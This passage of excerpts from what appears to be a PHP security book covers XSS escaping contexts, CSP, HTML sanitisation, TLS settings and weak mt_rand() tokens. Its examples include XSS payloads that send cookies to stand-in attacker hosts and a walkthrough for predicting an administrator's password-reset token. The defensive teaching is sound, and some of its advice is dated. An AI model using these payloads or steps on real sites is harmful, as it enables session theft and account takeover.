could encapsulate this in a check to only run for a moderator, i.e. if the user's name is displayed
somewhere we can match it against a list of known moderators or detect any special styling applied
to a moderator's displayed name in the absence of a known list.
As the above suggests, HttpOnly cookies are of limited use in defending against XSS. They block
the logging of cookies by an attacker but do not actually prevent their use during an XSS attack.
Furthermore, an attacker would prefer not to leave bread crumbs in the visible markup to arouse
suspicion unless they actually want to be detected.
Next time you see an example using the Javascript alert() function, substitute it with a XMLHttpRequest object like the one above.
In the above, $colour is populated from a database of user preferences which influence the background colour used for a block of text. The value is injected into a CSS Context which is a child
of a HTML Attribute Context, i.e. we're sticking some CSS into a style attribute. It may seem
unimportant to get so hooked up on Context but consider this:
$colour = "expression(document.write(<iframe src="
.= "http://evilattacker.com?cookie= + document.cookie.escape() + "
.= " height=0 width=0 />))";
<div style="background:<?php echo $colour ?>;">
If an attacker can successfully inject that colour, they can inject a CSS expression which will
execute the contained Javascript under Internet Explorer. In other words, the attacker was able to
switch out of the current CSS Context by injecting a new Javascript Context.
Now, I was very careless with the above example because I know some readers will be desperate
to get to the point of using escaping. So let's do that now.
$colour = "expression(document.write(<iframe src="
.= "http://evilattacker.com?cookie= + document.cookie.escape() + "
.= " height=0 width=0 />))";
If you checked this with Internet Explorer, you'd quickly realise something is seriously wrong.
After using htmlspecialchars() to escape $colour, the XSS attack is still working!
This is the importance of understanding Context correctly. Each Context requires a different
method of escaping because each Context has different special characters and different escaping needs. You cannot just throw htmlspecialchars() and htmlentities() at everything and pray that
your web application is safe.
What went wrong in the above is that the browser will always unescape HTML Attributes before interpreting the context. We ignored the fact there were TWO Contexts to escape for. The unescaped
HTML Attribute data is the exact same CSS as the unescaped example would have rendered anyway.
What we should have done was CSS escaped the $colour variable and only then HTML escaped it.
This would have ensured that the $colour value was converted into a properly escaped CSS literal
string by escaping the brackets, quotes, spaces, and other characters which allowed the expression()
to be injected. By not recognising that our attribute encompassed two Contexts, we escaped it as
if it was only one: a HTML Attribute. A common mistake to make.
The lesson here is that Context matters. In an XSS attack, the attacker will always try to jump out
of the current Context into another one where Javascript can be executed. If you can identify all
the Contexts in your HTML output, bearing in mind their nestable nature, then you're ten steps
closer to successfully defending your web application from Cross-Site Scripting.
Let's take another quick example:
<a href="http://www.example.com">Example.com</a>
Omitting untrusted input for the moment, the above can be dissected as follows:
1. There is a URL Context, i.e. the value of the href attribute.
2. There is a HTML Attribute Context, i.e. it parents the URL Context.
3. There is a HTML Body Context, i.e. the text between the <a> tags.
That's three different Contexts implying that up to three different escaping strategies would be
required if the data was determined by untrusted data. We'll look at escaping as a defense against
XSS in far more detail in the next section.
Each of the above locations is dangerous. Allowing data within script tags, outside of literal
strings and numbers, would let an attack inject Javascript code. Data injected into HTML comments might be used to trigger Internet Explorer conditionals and other unanticipated results. The
next two are more obvious as we would never want an attacker to be able to influence tag or
attribute names - that's what we're trying to prevent! Finally, as with scripts, we can't allow attackers to inject directly into CSS as they may be able to perform UI Redress attacks and Javascript
scripting using the Internet Explorer supported expression() function.
Always HTML Escape Before Injecting Data Into The HTML Body Context
The HTML Body Context refers to textual content which is enclosed in tags, for example text
included between <body>, <div>, or any other pairing of tags used to contain text. Data injected
into this content must be HTML escaped.
HTML Escaping is well known in PHP since it's implemented by the htmlspecialchars() function.
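For example (the variable names are illustrative):

$untrustedText = $_GET['comment'];
echo '<div>' . htmlspecialchars($untrustedText, ENT_QUOTES, 'UTF-8') . '</div>';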
Always HTML Attribute Escape Before Injecting Data Into The HTML Attribute Context
The HTML Attribute Context refers to all values assigned to element attributes with the exception
of attributes which are interpreted by the browser as CDATA. This exception is a little tricky but
largely refers to non-XML HTML standards where Javascript can be included in event attributes
unescaped. For all other attributes, however, you have the following two choices:
1. If the attribute value is quoted, you MAY use HTML Escaping; but
2. If the attribute is unquoted, you MUST use HTML Attribute Escaping.
The second option also applies where attribute quoting style may be in doubt. For example, it is
perfectly valid in HTML5 to use unquoted attribute values and examples in the wild do exist. Err
on the side of caution where there is any doubt.
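For a quoted attribute, a sketch using htmlspecialchars() with ENT_QUOTES (the variable name is illustrative); unquoted or uncertain attributes call for a dedicated attribute escaper from an escaping library:

echo '<input name="q" value="'
    . htmlspecialchars($untrustedValue, ENT_QUOTES, 'UTF-8') . '">';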
Always Javascript Escape Before Injecting Data Into Javascript Data Values
Javascript data values are basically strings. Since you can't escape numbers, there is a sub-rule you
can apply:
Always Validate Numbers...
The Content-Security Policy (CSP) is a HTTP header which communicates a whitelist of
resource sources that the browser can trust. Any source not included in the whitelist can now be
ignored by the browser since it's untrusted. Consider the following:
X-Content-Security-Policy: script-src 'self'
This CSP header tells the browser to only trust Javascript source URLs pointing to the current
domain. The browser will now grab scripts from this source but completely ignore all others.
This means that http://attacker.com/naughty.js is not downloaded if injected by an attacker. It also
means that all inline scripts, i.e. <script> tags, javascript: URIs or event attribute content are all
ignored too since they are not in the whitelist.
If we need to use Javascript from another source besides self, we can extend the whitelist to
include it. For example, let's include jQuery's CDN address.
X-Content-Security-Policy: script-src 'self' http://code.jquery.com
You can add other resource directives, e.g. style-src for CSS, by dividing each resource directive
and its whitelisting with a semi-colon.
The format of the header value is very simple. The value is constructed with a resource directive script-src followed by a space delimited list of sources to apply as a whitelist. The
source can be a quoted keyword such as self or a URL. The URL value is matched based
on the information given. Information omitted in a URL can be freely altered in the HTML
document. Therefore http://code.jquery.com prevents loading scripts from http://jquery.com or
http://domainx.jquery.com because we were specific as to which subdomain to accept. If we
wanted to allow all subdomains we could have specified just http://jquery.com. The same thinking
applies to paths, ports, URL scheme, etc.
The nature of the CSP's whitelisting is simple. If you create a whitelist of a particular type of
resource, anything not on that whitelist is ignored. If you do not define a whitelist for a resource
type, then the browser's default behaviour kicks in for that resource type.
Here's a list of the resource directives supported:
connect-src: Limits the sources to which you can connect using XMLHttpRequest, WebSockets, etc.
font-src: Limits the sources for web fonts.
frame-src: Limits the source URLs that can be embedded on a page as frames.
img-src: Limits the sources for images.
media-src: Limits the sources for video and audio.
object-src: Limits the sources for Flash and other plugins.
script-src: Limits the sources for script files.
style-src: Limits the sources for CSS files.
For maintaining secure defaults, there is also the special default-src directive that can be used to
create a default whitelist for all of the above. For example:
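Based on the description that follows, the header presumably looked something like:

X-Content-Security-Policy: default-src 'self'; script-src 'self' http://code.jquery.com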
The above will limit the source for all resources to the current domain but add an exception for
script-src to allow the jQuery CDN. This instantly shuts down all avenues for untrusted injected
resources and allows us to carefully open up the gates to only those sources we want the browser
to trust.
Besides URLs, the allowed sources can use the following keywords which must be encased with
single quotes:
'none' 'self' 'unsafe-inline' 'unsafe-eval'
You'll notice the usage of the term unsafe. The best way of applying the CSP is to not duplicate
an attacker's practices. Attackers want to inject inline Javascript and other resources. If we avoid
such inline practices, our web applications can tell browsers to ignore all such inlined resources
without exception. We can do this using external script files and Javascript's addEventListener()
function instead of event attributes. Of course, what's a rule without a few useful exceptions,
right? Seriously, eliminate any exceptions. Setting unsafe-inline as a whitelisting source just
goes against the whole point of using a CSP.
The none keyword means just that. If set as a resource source it just tells the browser to ignore
all resources of that type. Your mileage may vary but I'd suggest doing something like this so your
CSP whitelist is always restricted to what it allows:
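One presumed form of such a policy, starting from a default of 'none' and then explicitly whitelisting only what is actually needed:

X-Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'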
Just one final quirk to be aware of. Since the CSP is an emerging solution not yet out of draft,
you'll need to duplicate the X-Content-Security-Policy header to ensure it's also picked up by
WebKit browsers like Safari and Chrome. I know, I know, that's WebKit for you.
The act of generating HTML from such inputs (unless we received HTML to start with!) occurs on
the server. That implies a trustworthy operation which is a common mistake to make. The HTML
that results from such generators was still determined by an untrusted input. We can't assume
it's safe. This is simply more obvious with a blog feed since its entries are already valid HTML.
Let's take the following BBCode snippet:
[url=javascript:alert('I can haz Cookie?\n' + document.cookie)]Free Bitcoins Here![/url]
BBCode does limit the allowed HTML by design but it doesn't mandate, for example, using HTTP
URLs and most generators won't notice this creeping through.
As another example, take the following selection of Markdown:
I am a Markdown paragraph.<script>document.write('<iframe
src=http://attacker.com?cookie=' + document.cookie.escape() + ' height=0
width=0 />');</script>

There's no need to panic. I swear I am just plain text!
Markdown is a popular alternative to writing HTML but it also allows authors to mix HTML into
Markdown. It's a perfectly valid Markdown feature and a Markdown renderer won't care whether
there is an XSS payload included.
After driving home this point, the course of action needed is to HTML sanitise whatever we are
going to include unescaped in web application output after all generation and other operations have
been completed. No exceptions. It's untrusted input until we've sanitised it ourselves.
HTML Sanitisation is a laborious process of parsing the input HTML and applying a whitelist of
allowed elements, attributes and other values. It's not for the faint of heart, extremely easy to get
wrong, and PHP suffers from a long line of insecure libraries which claim to do it properly. Do
use a well established and reputable solution instead of writing one yourself.
The only library in PHP known to offer safe HTML Sanitisation is HTMLPurifier. It's actively
maintained, heavily peer reviewed and I strongly recommend it. Using HTMLPurifier is relatively
simple once you have some idea of the HTML markup to allow:
// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set('Core', 'Encoding', 'UTF-8');
$config->set('HTML', 'Doctype', 'HTML 4.01 Transitional');
// Create the whitelist
$config->set('HTML.Allowed', 'p,b,a[href],i'); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
$output = $sanitiser->purify($untrustedHtml);
Do not use another HTML Sanitiser library unless you are absolutely certain about what you're
doing.
CHAPTER 5
Insufficient Transport Layer Security
Communication between parties over the internet is fraught with risk. When you are sending
payment instructions to a store using their online facility, the very last thing you ever want to
occur is for an attacker to be capable of intercepting, reading, manipulating or replaying the HTTP
request to the online application. You can imagine the consequences of an attacker being able to
read your session cookie, or to manipulate the payee, product or billing address, or to simply to
inject new HTML or Javascript into the markup sent in response to a user request to the store.
Protecting sensitive or private data is serious business. Application and browser users have an
extremely high expectation in this regard placing a high value on the integrity of their credit card
transactions, their privacy and their identity information. The answer to these concerns when it
comes to defending the transfer of data from between any two parties is to use Transport Layer
Security, typically involving HTTPS, TLS and SSL.
The broad goals of these security measures are as follows:
To securely encrypt data being exchanged
To guarantee the identity of one or both parties
To prevent data tampering
To prevent replay attacks
The most important point to notice in the above is that all four goals must be met in order for
Transport Layer Security to be successful. If any one of the above are compromised, we have a
real problem.
A common misconception, for example, is that encryption is the core goal and the others are nonessential. This is, in fact, completely untrue. Encryption of the data being transmitted requires
that the other party be capable of decrypting the data. This is possible because the client and the
server will agree on an encryption key (among other details) during the negotiation phase when
the client attempts a secure connection. However, an attacker may be able to place themselves
between the client and the server using a number of simple methods to trick a client machine into
believing that the attacker is the server being contacted, i.e. a Man-In-The-Middle (MitM) Attack.
This encryption key will be negotiated with the MitM and not the target server. This would allow
the attacker to decrypt all the data sent by the client. Obviously, we therefore need the second goal
- the ability to verify the identity of the server that the client is communicating with. Without that
verification check, we have no way of telling the difference between a genuine target server and an
MitM attacker.
So, all four of the above security goals MUST be met before a secure communication can take
place. They each work to perfectly complement the other three goals and it is the presence of all
four that provides reliable and robust Transport Layer Security.
Aside from the technical aspects of how Transport Layer Security works, the other facet of securely
exchanging data lies in how well we apply that security. For example, if we allow a user to submit
an application's login form data over HTTP, we must then accept that a MitM is completely capable of intercepting that data and recording the user's login data for future use. If we allow pages loaded over HTTPS to, in turn, load non-HTTPS resources then we must accept that a MitM has a vehicle with which to inject Cross-Site Scripting attacks to turn the user's browser into a pre-programmed weapon that will operate over the browser's HTTPS connection transparently.
In judging the security quality of any implementation, we therefore have some very obvious measures drawn from the four goals I mentioned earlier:
1. Encryption: Does the implementation use a strong security standard and cipher suite?
2. Identity: Does the implementation verify the server's identity correctly and completely?
3. Data Tampering: Does the implementation fully protect user data for the duration of the user's session?
4. Replay Attacks: Does the implementation contain a method of preventing an attacker from recording requests and repetitively resending them to the server to repeat a known action or effect?
These questions are your core knowledge for this entire chapter. I will go into far more detail over
the course of the chapter, but everything boils down to asking those questions and identifying the
vulnerabilities where they fail to hold true.
A second core understanding is what user data must be secured. Credit card details, personally identifiable information and passwords are obviously in need of securing. However, what about the user's session ID? If we protect passwords but fail to protect the session ID, an attacker is still fully capable of stealing the session cookie while in transit and performing a Session Hijacking attack to impersonate the user on their own PC. Protecting login forms alone is NEVER sufficient to protect a user's account or personal information. The best security is obtained by restricting the user session to HTTPS from the time they submit a login form to the time they end their session.
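For example, a minimal PHP-level step in that direction (a sketch assuming PHP 5.x and the default session handler) is to mark the session cookie as Secure and HttpOnly before the session starts:

// Only send the session cookie over HTTPS and keep it away from
// document.cookie; also refuse session IDs passed in the URL.
ini_set('session.cookie_secure', 1);
ini_set('session.cookie_httponly', 1);
ini_set('session.use_only_cookies', 1);
session_start();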
You should now understand why this chapter uses the phrase "insufficient". The problem in implementing SSL/TLS lies not in failing to use it, but in failing to use it to a sufficient degree that user security is maximised.
This chapter covers the issue of Insufficient Transport Layer Security from three angles.
Between a server-side application and a third-party server.
and is backed up, in terms of expert peer review, by its large user base outside of PHP. Take this one simple step towards greater security and you will not regret it. A more ideal solution would be for PHP's internal developers to wake up and apply the Secure By Default principle to its built-in SSL/TLS support.
My introduction to SSL/TLS in PHP is obviously very harsh. Transport Layer Security vulnerabilities are far more basic than most security issues and we are all familiar with the emphasis it receives in browsers. Our server-side applications are no less important in the chain of securing user data. Let's examine SSL/TLS in PHP in more detail by looking in turn at PHP Streams and the superior CURL extension.
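PHP Streams address resources through wrapper schemes; for example, reading a local file through the explicit file:// wrapper looks like this (the path shown is purely illustrative):

file_get_contents('file:///tmp/file.ext');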
Streams default to using a File Wrapper, so you don't ordinarily need to use a file:// URL and can even use relative paths. This should be obvious since most filesystem functions such as file(), include(), require_once and file_get_contents() all accept stream references. So we can rewrite the above example as:

file_get_contents('/tmp/file.ext');

Besides files, and of relevance to our current topic of discussion, we can also do the following:

file_get_contents('http://www.example.com');
Back to using PHP Streams as a simple HTTP client (which you now know is NOT recommended), things get interesting when you try the following:

$url = 'https://api.twitter.com/1/statuses/public_timeline.json';
$result = file_get_contents($url);
The above is a simple unauthenticated request to the (former) Twitter API 1.0 over HTTPS. It also has a serious flaw. PHP uses an SSL Context for requests made using the HTTPS (https://) and FTPS (ftps://) wrappers. The SSL Context offers a lot of settings for SSL/TLS and their default values are wholly insecure. The above example can be rewritten as follows to show how a default set of SSL Context options can be plugged into file_get_contents() as a parameter:

$url = 'https://api.twitter.com/1/statuses/public_timeline.json';
$contextOptions = array(
    'ssl' => array()
);
$sslContext = stream_context_create($contextOptions);
$result = file_get_contents($url, NULL, $sslContext);
As described earlier in this chapter, failing to securely configure SSL/TLS leaves the application open to Man-In-The-Middle (MitM) attacks. PHP Streams are entirely insecure over SSL/TLS by default. So, let's correct the above example to make it completely secure!
$url = 'https://api.twitter.com/1/statuses/public_timeline.json';
$contextOptions = array(
    'ssl' => array(
        'verify_peer'         => true,
        'cafile'              => '/etc/ssl/certs/ca-certificates.crt',
        'verify_depth'        => 5,
        'CN_match'            => 'api.twitter.com',
        'disable_compression' => true,
        'SNI_enabled'         => true,
        'ciphers'             => 'ALL!EXPORT!EXPORT40!EXPORT56!aNULL!LOW!RC4'
    )
);
$sslContext = stream_context_create($contextOptions);
$result = file_get_contents($url, NULL, $sslContext);
Now we have a secure example! If you contrast this with the earlier example, you'll note that we had to set a number of options which were, by default, unset or disabled by PHP. Let's examine each in turn to demystify their purpose.
verify_peer
Peer Verification is the act of verifying that the SSL Certificate presented by the Host we sent the
HTTPS request to is valid. In order to be valid, the public certificate from the server must be
signed by the private key of a trusted Certificate Authority (CA). This can be verified using the CA's public key which will be included in the file set as the cafile option to the SSL Context we're using. The certificate must also not have expired.
cafile
The cafile setting must point to a valid file containing the public keys of trusted CAs. This is not provided automatically by PHP so you need to have the keys in a concatenated certificate formatted file (usually a PEM or CRT file). If you're having any difficulty locating a copy, you can download one, parsed from Mozilla's VCS, from http://curl.haxx.se/ca/cacert.pem. Without this file, it is impossible to perform Peer Verification and the request will fail.
verify_depth
This setting sets the maximum allowed number of intermediate certificate issuers, i.e. the number
of CA certificates which are allowed to be followed while verifying the initial client certificate.
CN_match
The previous three options focused on verifying the certificate presented by the server. They do
not, however, tell us if the verified certificate is valid for the domain name or IP address we are
requesting, i.e. the host part of the URL. To ensure that the certificate is tied to the current domain/IP, we need to perform Host Verification. In PHP, this requires setting CN_match in the
SSL Context to the HTTP host value (including subdomain part if present!). PHP performs the
matching internally so long as this option is set. Not performing this check would allow a MitM
to present a valid certificate (which they can easily apply for on a domain under their control) and
reuse it during an attack to ensure they are presenting a certificate signed by a trusted CA. However, such a certificate would only be valid for their domain - and not the one you are seeking to
connect to. Setting the CN_match option will detect such certificate mismatches and cause the
HTTPS request to fail.
While such a valid certificate used by an attacker would contain identity information specific to the attacker (a precondition of getting one!), please bear in mind that there are undoubtedly any number of valid CA-signed certificates, complete with matching private keys, available to a knowledgeable attacker. These may have been stolen from another company or slipped past a trusted CA's radar, as happened in 2011 when DigiNotar notoriously (sorry, couldn't resist) issued a certificate for google.com to an unknown party who went on to employ it in MitM attacks predominantly against Iranian users.
disable_compression
This option was introduced in PHP 5.4.13 and it serves as a defence against CRIME attacks and other padding oracle derived attacks such as BEAST. At the time of writing, it had been available for 10 months and locating a single example of its use in open source PHP was practically a quest in extreme patience.
SNI_enabled
Enables support for Server Name Indication where any single IP address may be configured to
present multiple SSL certificates rather than be restricted to a single certificate for all websites or
non-HTTP services hosted at that IP.
ciphers

This setting allows programmers to indicate which ciphers should or should not be used when establishing SSL/TLS connections. The default list of ciphers supplied by the openssl extension contains a number of unsafe ciphers which should be disabled unless absolutely necessary. The above cipher list, in a syntax accepted by openssl, was implemented by cURL during January 2014. An alternative cipher list has been suggested by Mozilla which may be better since it emphasises Perfect Forward Secrecy, an emerging best practice approach. The Mozilla list is a bit longer:
ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA3
Limitations
As described above, verifying that the certificate presented by a server is valid for the host in the URL that you're using ensures that a MitM cannot simply present any valid certificate they can purchase or illegally obtain. This is an essential step, one of four, to ensuring your connection is absolutely secure.
The CN_match parameter exposed by the SSL Context in PHP's HTTPS wrapper tells PHP to perform this matching exercise but it has a downside. At the time of writing, the matching used will only check the Common Name (CN) of the SSL certificate but ignore the equally valid Subject Alternative Names (SANs) field if defined by the certificate. A SAN lets you protect multiple domain names with a single SSL certificate so it's extremely useful and supported by all modern browsers. Since PHP does not currently support SAN matching, connections over SSL/TLS to a domain secured using such a certificate will fail. SAN support for PHP will be introduced in PHP 5.6.
The CURL extension, on the other hand, supports SANs out of the box so it is far more reliable and should be used in preference to PHP's built-in HTTPS/FTPS wrappers. Using PHP Streams with this issue introduces a greater risk of erroneous behaviour which in turn would tempt impatient programmers to disable host verification altogether, which is the very last thing we want to see.
SSL Context in PHP Sockets
Many HTTP clients in PHP will offer both a CURL adapter and a default PHP Socket based
adapter. The default choice for using sockets reflects the fact that CURL is an optional extension
and may be disabled on any given server in the wild.
PHP Sockets use the same SSL Context resource as PHP Streams, so they inherit all of the problems and limitations described earlier. This has the side-effect that many major HTTP clients are themselves, by default, likely to be unreliable and less safe than they should be. Such client libraries should, where possible, be configured to use their CURL adapter if available. You should also review such clients to ensure they are not disabling (or forgetting to enable) the correct approach to secure SSL/TLS.
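For instance, the hardened SSL context options shown earlier in this chapter can also be applied to a raw socket connection (a sketch reusing the $contextOptions array from the earlier example):

// Apply the same SSL context options to a TLS socket connection.
$context = stream_context_create($contextOptions);
$socket = stream_socket_client(
    'ssl://api.twitter.com:443',
    $errno,
    $errstr,
    30,
    STREAM_CLIENT_CONNECT,
    $context
);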
Additional Risks?
This is why my recommendation to you is to prefer CURL for HTTPS requests. It's secure by default whereas PHP Streams is most definitely not. If you feel comfortable setting up SSL context options, then feel free to use PHP Streams. Otherwise, just use CURL and avoid the headache. At the end of the day, CURL is safer, requires less code, and is less likely to suffer a human-error related failure in its SSL/TLS security.
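If you do use CURL, the verification options can also be stated explicitly (a minimal sketch; cURL verifies peers and hostnames by default, so this simply guards against the options being disabled somewhere upstream):

$url = 'https://api.twitter.com/1/statuses/public_timeline.json';
$req = curl_init($url);
curl_setopt($req, CURLOPT_RETURNTRANSFER, true);
curl_setopt($req, CURLOPT_SSL_VERIFYPEER, true); // verify the peer certificate
curl_setopt($req, CURLOPT_SSL_VERIFYHOST, 2);    // verify the certificate matches the hostname
$result = curl_exec($req);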
At the time of writing, PHP 5.6 has reached an alpha1 release. The final release of PHP 5.6 will introduce more secure defaults for PHP streams and socket connections over SSL/TLS. These changes will not be backported to PHP 5.3, 5.4 or 5.5. As such, all programmers will need to implement secure default settings as a conscious choice until such time as PHP 5.6 is a minimum requirement for their code.
Of course, if the CURL extension was enabled without the location of a trusted certificate bundle being configured, the above example would still fail. For libraries intending to be publicly distributed, the programmer will need to follow a sane pattern which enforces secure behaviour:
$url = 'https://api.twitter.com/1/statuses/public_timeline.json';
$req = curl_init($url);
curl_setopt($req, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($req);

/**
 * Check if an error is an SSL failure and retry with bundled CA certs on
 * the assumption that the local server has none configured for ext/curl.
 * Error 77 refers to CURLE_SSL_CACERT_BADFILE which is not defined as
 * a constant in PHP's manual for some reason.
 */
$error = curl_errno($req);
if ($error == CURLE_SSL_PEER_CERTIFICATE || $error == CURLE_SSL_CACERT
        || $error == 77) {
    curl_setopt($req, CURLOPT_CAINFO, __DIR__ . '/cert-bundle.crt');
    $result = curl_exec($req);
}

/**
 * Any subsequent errors cannot be recovered from while remaining
 * secure. So do NOT be tempted to disable SSL and try again ;).
 */
CHAPTER 6
Insufficient Entropy For Random Values
Random values are everywhere in PHP. They are used in all frameworks, many libraries and you
probably have tons of code relying on them for generating tokens, salts, and as inputs into further
functions. Random values are important for a wide variety of use cases.
1. To randomly select options from a pool or range of known options.
2. To generate initialisation vectors for encryption.
3. To generate unguessable tokens or nonces for authorisation purposes.
4. To generate unique identifiers like Session IDs.
All of these have a specific weakness. If any attacker can guess or predict the output from the
Random Number Generator (RNG) or Pseudo-Random Number Generator (PRNG) you use, they
will be able to correctly guess the tokens, salts, nonces and cryptographic initialisation vectors created using that generator. Generating high quality, i.e. extremely difficult to guess, random values
is important. Allowing password reset tokens, CSRF tokens, API keys, nonces and authorisation
tokens to be predictable is not the best of ideas!
The two potential vulnerabilities linked to random values in PHP are:
1. Information Disclosure
2. Insufficient Entropy
Information Disclosure, in this context, refers to the leaking of the internal state, or seed value, of a PRNG. Leaks of this kind can make predicting future output from the PRNG in use much easier. Insufficient Entropy refers to the initial internal state or seed of a PRNG being so limited that it or the PRNG's actual output is restricted to a more easily brute-forcible range of possible values. Neither is good news for PHP programmers.

We'll examine both in greater detail with a practical attack scenario outlined soon, but let's first look at what a random value actually means when programming in PHP.
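Consider the following short script, which seeds the Mersenne Twister with a predetermined value (the sample seed below is a hypothetical output of the make_seed() example from the mt_srand() documentation, i.e. current seconds and microseconds) and prints 25 numbers:

<?php
// Seed mt_rand() with a fixed, predetermined value.
mt_srand(1361152757.2);

// Print 25 pseudorandom numbers from the Mersenne Twister.
for ($i = 0; $i < 25; $i++) {
    echo mt_rand(), PHP_EOL;
}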
The above script is a simple loop executed after we've seeded PHP's Mersenne Twister function with a predetermined value (using the output from the example function in the docs for mt_srand() which used the current seconds and microseconds). If you execute this script, it will print out 25 pseudorandom numbers. They all look random, there are no collisions and all seems fine. Run the script again. Notice anything? Yes, the next run will print out the EXACT SAME numbers.
So will the third, fourth and fifth run. This is not always a guaranteed outcome given variations
between PHP versions in the past but this is irrelevant to the problem since it does hold true in all
modern PHP versions.
If the attacker can obtain the seed value used in PHP's Mersenne Twister PRNG, they can predict all of the output from mt_rand(). When it comes to PRNGs, protecting the seed is paramount. If you lose it, you are no longer generating random values... This seed can be generated in one of two ways. You can use the mt_srand() function to manually set it, or you can omit mt_srand() and let PHP generate it automatically. The second is much preferred but legacy applications, even today, often inherit the use of mt_srand() even if ported to higher PHP versions.
This raises a risk whereby the recovery of a seed value by an attacker (i.e. a successful Seed
Recovery Attack) provides them with sufficient information to predict future values. As a result,
any application which leaks such a seed to potential attackers has fallen afoul of an Information
Disclosure vulnerability. This is actually a real vulnerability despite its apparently passive nature.
Leaking information about the local system can assist an attacker in follow up attacks which would
be a violation of the Defense In Depth principle.
be blocked until sufficient entropy has been captured from the system environment. You should
revert to /dev/random, obviously, for the most critical of needs when necessary.
All of this leads us to the following rule...
All processes which require non-trivial random numbers MUST attempt to use
openssl_random_pseudo_bytes(). You MAY fall back to mcrypt_create_iv() with
the source set to MCRYPT_DEV_URANDOM. You MAY also attempt to directly read
bytes from /dev/urandom. If all else fails, and you have no other choice,
you MUST instead generate a value by strongly mixing multiple sources of
available random or secret values.
You can find a reference implementation of this rule in the SecurityMultiTool reference library. As is typical, PHP Internals prefers to complicate programmers' lives rather than include something secure directly in PHP's core.
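A rough sketch of that fallback chain might look like the following (the function name is an illustrative choice, and the final mixing branch is indicative only, not a vetted implementation):

// Illustrative fallback chain for generating $length random bytes.
function generate_random_bytes($length = 32)
{
    // Preferred: OpenSSL's CSPRNG, checking the $strong flag it reports.
    if (function_exists('openssl_random_pseudo_bytes')) {
        $bytes = openssl_random_pseudo_bytes($length, $strong);
        if ($bytes !== false && $strong === true) {
            return $bytes;
        }
    }
    // Fallback: mcrypt reading from /dev/urandom.
    if (function_exists('mcrypt_create_iv')) {
        $bytes = mcrypt_create_iv($length, MCRYPT_DEV_URANDOM);
        if ($bytes !== false) {
            return $bytes;
        }
    }
    // Fallback: read /dev/urandom directly.
    if (is_readable('/dev/urandom')) {
        $bytes = file_get_contents('/dev/urandom', false, null, 0, $length);
        if ($bytes !== false && strlen($bytes) === $length) {
            return $bytes;
        }
    }
    // Last resort: strongly mix multiple weak/secret sources (indicative only).
    $mixed = '';
    while (strlen($mixed) < $length) {
        $mixed .= hash('sha256', uniqid(mt_rand(), true) . lcg_value() . memory_get_usage(), true);
    }
    return substr($mixed, 0, $length);
}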
Enough theory, let's actually look into how we can attack an application with this information.
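Imagine a password reset token generated with the following minimal pattern (a sketch of the vulnerable approach under discussion, not any specific application's code):

$token = hash('sha512', mt_rand());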
There are certainly more complicated means of generating a token but this is a nice variant with only one call to mt_rand() that is hashed using SHA512. In practice, if a programmer assumes that PHP's random value functions are sufficiently random, they are far more likely to utilise a simple usage pattern so long as it doesn't involve the word "cryptography". Non-cryptographic uses may include access tokens, CSRF tokens, API nonces and password reset tokens, to name a few. Let me describe the characteristics of this vulnerable application in greater detail before we continue any further so we have some insight into the factors making this application vulnerable.
no hashing whatsoever). The example code we're using generates tokens with some of these factors in evidence. I also included SHA512 hashing to demonstrate that obscuration is simply never a solution. SHA512 is actually a weak hashing solution in the sense that it is fast to compute, i.e. it allows an attacker to brute force inputs on any CPU or GPU at some incredible rates, bearing in mind that Moore's Law ensures that that rate increases with each new CPU/GPU generation. This is why passwords must be hashed with something that requires a fixed time to execute irrespective of CPU/GPU performance or Moore's Law.
This simulates the token from Request A (which is our SHA512 hash hiding the generated random number we need), which we then run through hashcat using the following command.
This might take a bit more time than cracking the SHA512 hash since it's CPU bound, but it will search the entire possible seed space inside of a few minutes on a decent CPU. The result will be one or more candidate seeds (i.e. seeds which produce the given random number). Once again, we're seeing the outcome of weak entropy, though this time as it pertains to how PHP generates seed values for its Mersenne Twister function. We'll revisit how these seeds are generated later on so you can see why such a brute forcing attack is possible in such a spectacularly short time.

In the above steps, we made use of simple brute forcing tools that exist in the wild. Just because these tools have a narrow focus on single mt_rand() calls, bear in mind that they represent proofs of concept that can be modified for other scenarios (e.g. sequential mt_rand() calls when generating tokens). Also bear in mind that the cracking speed does not preclude the generation of rainbow tables tailored to specific token generating approaches. Here's another generic tool written in Python which targets PHP mt_rand() vulnerabilities: https://github.com/GeorgeArgyros/Snowflake
This function will predict the reset token for each candidate seed.
Steps 6 and 7: Reset the Administrator Account Password / Be naughty!

All you need to do now is construct a URL containing the token which will let you reset the Administrator's password via the vulnerable application, gain access to their account, and probably find out that they can post unfiltered HTML to a forum or article (another Defense In Depth violation that can be common). That would allow you to mount a widespread Cross-Site Scripting (XSS) attack on all other application users by infecting their PCs with malware and Man-In-The-Browser monitors. Seriously, why stop with just access? The whole point of these seemingly passive, minor and low severity vulnerabilities is to help attackers slowly worm their way into a position where they can achieve their ultimate goal. Hacking is like playing an arcade fighting game where you need combination attacks to pull off some devastating moves.
framework, in question is doing nothing to mitigate against Seed Recovery Attacks. Do we blame
the user for leaking mt_rand() values or the library for not using better randomness?
The answer to that is that there is enough blame to go around for both. The library should not be
using mt_rand() (or any other single source of weak entropy) for any sensitive purposes as its sole
source of random values, and the user should not be writing code that leaks mt_rand() values to
the world. So yes, we can actually start pointing fingers at unwise uses of mt_rand() even where
those uses are not directly leaking to attackers.
So not only do we have to worry about Information Disclosure vulnerabilities, we also need to be
conscious of Insufficient Entropy vulnerabilities which leave applications vulnerable to brute force
attacks on sensitive tokens, keys or nonces which, while not technically cryptography related, are
still used for important non-trivial functions in an application.
Assuming the presence of an Information Disclosure vulnerability, we can now state that this method of generating tokens is also completely useless. To understand why this is so, we need to take a closer look at PHP's uniqid() function. The definition of this function is as follows:

Gets a prefixed unique identifier based on the current time in microseconds.
If you remember from our discussion of entropy, you measure entropy by the amount of uncertainty
it introduces. In the presence of an Information Disclosure vulnerability which leaks mt_rand()
values, our use of mt_rand() as a prefix to a unique identifier has zero uncertainty. The only other
input to uniqid() in the example is time. Time is definitely NOT uncertain. It progresses in a
predictable linear manner. Predictable values have very low entropy.
Of course, the definition notes microseconds, i.e. millionths of a second. That provides 1,000,000 possible numbers. I ignore the larger seconds value since that is so coarse grained and measurable (e.g. via the HTTP Date header in a response) that it adds almost nothing of value. Before we get into more technical details, let's dissect the uniqid() function by looking at its C code.
